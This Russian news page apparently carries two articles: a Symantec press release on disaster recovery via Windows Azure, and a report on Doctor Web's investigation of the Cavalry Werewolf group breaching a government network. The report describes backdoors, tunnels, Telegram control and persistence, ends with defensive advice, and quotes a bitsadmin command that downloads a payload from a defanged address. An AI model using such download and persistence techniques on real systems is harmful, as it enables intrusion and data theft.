Решения Symantec теперь поддерживают облачную платформу Windows Azure

Решения Symantec теперь поддерживают облачную платформу Windows Azure

Корпорация Symantec объявила, что решения Storage Foundation High Availability для Windows и Veritas Volume Replicator Disaster Recovery (DR) отныне будут поддерживать облачную платформу Windows Azure корпорации Microsoft. Теперь в случае отказа локального уровня или при выходе из строя сайта, решения Symantec обеспечат для организаций любого масштаба возможность восстановления важных приложений и данных в Windows Azure.

Это расширяет возможности существующих продуктов для обеспечения устойчивости функционирования систем, разработанных Symantec для корпорацииMicrosoft, предоставляя сервис аварийного восстановления (DRaaS) локального ПО с помощью облачной платформы.

Быстрое и экономичное аварийное восстановление с облачной платформой

Организации постоянно предъявляют требования к поставщикам решений по дальнейшему повышению защищенности и увеличению возможностей для восстановления данных, включая постоянное использование общедоступных облачных платформ для восстановления данных при сбоях. В соответствии с исследованиемIDC рынка устойчивости функционирования в 2011 году, «усовершенствования программного обеспечения для копирования, организации кластеров и виртуализации серверов обеспечили возможность более гибкого подхода к построению схем устойчивости функционирования (BC). Учитывая растущий спрос на средства для обеспечения безотказной работы бизнеса и тенденцию повышения доверия корпоративных клиентов к средствам информационных технологий, роль общедоступных облачных платформ на рынке BC будет и дальше расти». Поскольку в организациях возможны  простои по причине аварий, сбоев устройств хранения, проблем сетей, отсутствия питания при техобслуживании либо авариях, организациям требуется не связанное с их локальной инфраструктурой решение, обеспечивающее быстрое восстановление данных, чтобы обеспечить пользователям доступность приложений и информации.

Гибкая защита важных для бизнеса приложений

Сервис Symantec DRaaS с платформой Windows Azure выходит за рамки сегодняшних предложений по архивированию и восстановлению данных в облаке. Удостоенные наград технологии Symantec по обеспечению высокой доступности и аварийного восстановления данных Veritas Storage Foundation High Availability и Veritas Volume Replicator, позволят организациям не только защитить данные, но также организовать защиту приложений. Решение Symantec DRaaS предоставляет организациям преимущества, значительно сокращая время на восстановление данных и улучшая показатели восстановления важных приложений в случае отказа электропитания в офисных помещениях. Решение не только обеспечивает своевременное восстановление данных важных для бизнеса приложений, но и предоставляет средства полномасштабной координации восстановления на всех уровнях: начиная от уровня данных и вплоть до уровня приложений. ИТ-отделам организаций благодаря использованию преимуществ облачных сервисов Windows Azure не требуется самостоятельно поддерживать отдельный сайт DR.

Платформой для решения являются лидирующие на рынке технологии Symantec Veritas Storage Foundation High Availability и Veritas Volume Replicator. С этого момента компания Symantec расширяет интеграцию с решениями Microsoft для повышения доступности и совместимости данных при аварийном восстановлении – включая как Windows Server 2008 R2, Windows Server Hyper-V, так и Windows Azure.

Мнения экспертов:

«В сегодняшней экономической ситуации заказчики рассматривают облачные платформы в качестве нового варианта гибких и экономичных решений», – заявил вице-президент по разработкам IDC Жан С. Бозмен (Jean S. Bozman). - «Многие организации заняты поисками способов автоматизации восстановления бизнес-данных, а также поддержания работоспособности важных приложений при отключении электропитания, когда бизнес-процесс может быть прерван на несколько часов. Сегодня использование облачных платформ в качестве решений по аварийному восстановлению (DR) полностью отвечает требованиям устойчивости в организациях, которые не могут позволить себе содержание резервных сайтов или удаленных ресурсов для важных виртуализированных вычислительных объемов».

«Windows Azure предназначена для обеспечения быстрого восстановления и доступности данных», – заявил Валид Абу-Хаба (Walid Abu-Hadba), вице-президент, а по совместительству и разработчик, и апологет платформ компании Microsoft. - «Сервис Symantec нацелен на расширение присущей Windows Azure надежности и поможет заказчикам восстановить локальные приложения и данные с помощью решения для аварийного восстановления и обеспечения устойчивости функционирования систем с использованием дополнительных технологий как Symantec, так и Microsoft».

«Windows Azure – быстро развивающаяся платформа, и мы видим, что всё больше наших заказчиков используют её как часть новой вычислительной модели». – Заявил Дипак Мохан (Deepak Mohan), первый вице-президент, руководитель группы по работе в области хранения и доступности данных компании Symantec. - «Используя проверенную технологию для высокой доступности данных Symantec и облачную платформу Microsoft, организации могут быть уверены, что их бизнес не остановится даже в случае аварий и отключений электропитания».

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Группировка Cavalry Werewolf взломала сеть госоргана с помощью бэкдоров

В июле 2025 года к специалистам компании «Доктор Веб» обратился клиент из госсектора с жалобой на рассылку подозрительных писем с корпоративного почтового ящика. Расследование показало: перед ними была целевая кампания кибергруппировки, которую аналитики идентифицировали как Cavalry Werewolf.

Цель атаки — сбор конфиденциальной информации и картирование сети для дальнейшего закрепления внутри инфраструктуры.

Начали злоумышленники банально, но эффективно — с фишинга. В качестве «приманки» приходили архивы с паролем и вложенным бэкдором BackDoor.ShellNET.1 (основан на открытом проекте Reverse-Shell-CS). Файлы маскировались под служебные записки и другие официальные документы — имена были соответствующие, чтобы снизить бдительность получателя.

 

После запуска BackDoor.ShellNET.1 атакующие использовали стандартный для Windows инструмент bitsadmin для скачивания дополнительных полезных нагрузок (пример: bitsadmin /transfer www /download hxxp://…/winpot.exe). Среди загруженных модулей оказался стилер Trojan.FileSpyNET.5, который массово тянул документы (.doc/.docx/.xlsx/.pdf), текстовые файлы и изображения. Для скрытого доступа применяли BackDoor.Tunnel.41 (вариант ReverseSocks5) — с его помощью создавались SOCKS5-туннели и обеспечивалось скрытое подключение к заражённому ПК.

Дальше — больше: специалисты «Доктор Веб» обнаружили целый набор инструментов, как собственных, так и основанных на open-source. В арсенале группировки — скриптовые загрузчики (например, BAT.DownLoader.1138), «упакованные» трояны (Trojan.Packed2.49708, Trojan.Siggen31.54011 и т. п.), бэкдоры, управляемые через телеграм-ботов (BackDoor.Siggen2.5463, BackDoor.ShellNET.2), а также прокси-модули типа BackDoor.ReverseProxy.1. Некоторые варианты внедряли полезную нагрузку в легитимные процессы — например, инжектировали данные в aspnet_compiler.exe, чтобы бэкдор выполнялся в контексте доверенного приложения.

 

Интересно, что злоумышленники активно пользуются открытими решениями: либо берут код «как есть», либо модифицируют его под свои нужды. Для доставки следующей волны вредоносов они используют стандартные утилиты — PowerShell, bitsadmin, curl — а для сохранения присутствия в системе модифицируют автозагрузку через реестр (HKCU\...\Run) или ставят исполняемые файлы в C:\users\public\pictures и похожие публичные папки.

Атака Cavalry Werewolf показала типичную для целевых кампаний логику: разведка (whoami, ipconfig, просмотр директорий), проверка прокси и сети, затем загрузка инструментов и закрепление. Также злоумышленники могли позже использовать скомпрометированные устройства для перехода в другие сети — например, при смене работы жертвы — и разворачивать дальнейшие атаки через доверенные каналы.

Отдельные особенности группировки, которые отмечают аналитики «Доктор Веб»: предпочтение к open-source-инструментам, частое использование обратных шеллов и SOCKS-туннелей, внедрение вреда в видимо «безобидные» программы и управление через Telegram API. Фишинговые рассылки имитируют сообщения от государственных органов — это снижает подозрительность целевой аудитории и повышает шансы успешной компрометации.

Рекомендации для организаций — стандартный, но действенный набор мер: усилить фильтрацию почты и блокировку подозрительных вложений, ограничить возможность запуска bitsadmin/PowerShell неподписанных скриптов, включить контроль исполнения (application control) и EDR, регулярно проверять целевые публичные папки, применять многофакторную аутентификацию и оперативно реагировать на подозрительные соединения с неизвестными C2-адресами. При обнаружении инцидента — немедленно изолировать пострадавшие хосты и провести полноценную форензику, чтобы выявить степень компрометации.

Расследование «Доктор Веб» — ещё одно напоминание: даже крупные организации с государственным уровнем защиты уязвимы к грамотному фишингу и тому, что за ним следует. В современных целевых атаках именно сочетание человеческой ошибки и хорошо отлаженных инструментов злоумышленников делает наибольший ущерб.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru